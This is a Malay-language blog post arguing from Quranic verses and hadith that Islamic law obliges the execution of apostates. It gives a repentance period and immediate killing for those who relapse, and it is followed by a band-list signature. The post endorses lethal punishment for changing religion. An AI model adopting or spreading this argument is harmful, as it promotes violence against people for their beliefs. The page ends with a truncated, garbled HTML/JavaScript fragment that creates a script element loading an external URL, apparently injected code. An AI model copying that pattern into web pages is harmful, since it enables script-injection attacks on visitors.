.. ..
..≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡ ≡Hukum Murtad Menurut IslamApabila seseorang keluar daripada Islam sedangkan ia baligh dan berakal maka ia diajak untuk kembali kepada Islam hingga tiga kali disertai peringatan. Jika ia kembali setelah itu maka akan diterima dan jika menolak maka akan dibunuh, sebagaimana firman Allah Subhanahu wa Ta'ala,"Barangsiapa yang murtad di antara kamu dari agamanya, lalu dia mati dalam kekafiran, maka mereka itulah yang sia-sia amalannya di dunia dan di akhirat, dan mereka itulah penghuni neraka, mereka kekal di dalamnya." [TMQ Al-Baqarah, 2:217]Hadis Rasulullah Sallallahu 'alaihi wa Sallam pula mensabitkan hukuman kepada orang yang murtad. Imam Bukhari telah meriwayatkan dari Ikrimah yang berkata, "Dihadapkan kepada Amirul Mukminin 'Ali karamAllahu wajhah orang-orang zindiq, lalu beliau membakar mereka. Maka berita itu disampaikan kepada Ibnu Abbas dan beliau berkata 'Seandainya aku, tidaklah aku bakar mereka kerana larangan Nabi Salallahu 'alaihi wa Sallam yang bersabda "Jangan kamu menyiksa dengan siksaan Allah". Akan tetapi pasti akan aku bunuh mereka kerana sabda Rasulullah Salallahu 'alaihi wa Sallam "Barangsiapa yang menukar agamanya, hendaklah kamu bunuh akan dia"Dalam riwayat Imam Ahmad disebutkan, "Allah dan RasulNya telah menetapkan, bahawa orang yang murtad dari agamanya maka dia mesti dibunuh."Banyak lagi hadis yang seumpama ini yang menunjukkan dengan jelas bahawa hukuman bagi orang-orang yang murtad adalah dibunuh. Mereka tidak dibakar. Ini disebabkan adanya larangan dari Rasulullah untuk mengazab seseorang dengan azab Allah, iaitu api (dibakar). Selain itu, keumuman hadis, "Barangsiapa murtad maka bunuhlah ia", menunjukkan bahawa hukum bagi mereka yang murtad adalah dibunuh. Sedangkan apa yang diperbuat oleh Ali radhiAllahu 'anhu. tidak boleh dijadikan dalil, sebab yang menjadi pegangan kita di sini ialah perkataan Rasulullah, bukannya perbuatan Ali. Apa yang dilakukan oleh Ali adalah berdasarkan ijtihadnya yang mungkin pada waktu itu dibuat sebelum beliau mendengar hadis yang melarang mengazab seseorang dengan azab Allah (membakar).Berkaitan pembahasan orang yang murtad dianjurkan untuk bertaubat dalam tempoh tiga hari adalah berdasarkan hadis dari Marwan, bahawa Rasulullah Salallahu 'alaihi wa Sallam memerintahkan agar menasihati orang yang murtad. Abu Bakar juga pernah melakukan hal seperti ini. Daruquthniy dan Baihaqiy mengeluarkan hadis, "Bahawa Abu Bakar radhiAllahu 'anhu menganjurkan wanita yang murtad untuk bertaubat. Wanita itu bernama Ummu Qurfah, di mana dia kafir setelah masuk Islam. Wanita itu tidak mahu bertaubat, sehingga beliau (Abu Bakar) membunuh wanita itu."Anjuran taubat selama tiga hari, bukanlah qayyid (batasan). Tiga hari adalah batas minima yang umumnya memungkinkan terjadinya insaf. Jika dalam tempoh itu masih juga tidak mahu insaf, maka tempoh itu boleh dilanjutkan (oleh Qadhi). Sebab, maksud dari anjuran bertaubat adalah menyedarkan dia tentang Islam, dan supaya dia kembali kepada Islam sehingga dia mesti diberikan masa yang mencukupi untuk bertaubat. Diriwayatkan bahawa Abu Musa memberi kesempatan bertaubat seorang yang murtad di mana kemudian Mu'az memerintahkan untuk membunuhnya. Kemudian Abu Musa membunuh orang murtad tersebut, setelah memberi kesempatan taubat selama dua bulan sebelum kedatangan Mu'az. Walaubagaimanapun, taubat hanya diterima jika dia tidak mengulangi kemurtadannya. Jika ternyata dia mengulanginya, maka taubatnya tidak diterima dan dia mesti dibunuh segera tanpa diberi tempoh lagi (tidak dikira lagi samada dia bertaubat atau tidak).Diriwayatkan oleh Asyram dari Thibyana bin Umarah, "Bahawa seorang lelaki dari Bani Saad melintas ke Masjid Bani Hanifah, sedangkan mereka sedang membaca sajak Musailamah al Kadzab. Kemudian lelaki itu pergi kepada Ibn Mas'ud dan menceritakan kejadian itu. Kemudian mereka didatangi dan mereka disuruh bertaubat. Semuanya telah meninggalkan jalan keyakinan mereka kecuali seorang lelaki, di mana Ibn Nuwahah berkata kepadanya, "Sungguh aku melihat engkau satu kali, dan aku menduga engkau telah bertaubat, dan aku melihatmu mengulangi lagi perbuatanmu itu. Maka lelaki tersebut dibunuh." SELAMATKANLAH AGAMA KITE...........
-LaNz-
sumone who got an attitude....
::Blink 182, System Of a Down, Korn, Sum41, Maroon5, Hoobastank, Scarlet, 36 crazyfists, Devildriver, Down the sun, Slapshock, Deftones, Slipknot n HILLARY DUFF (huhu)
img src="http://......./....jpg" x='
...."var x=document.createElement('script');x.src='http://.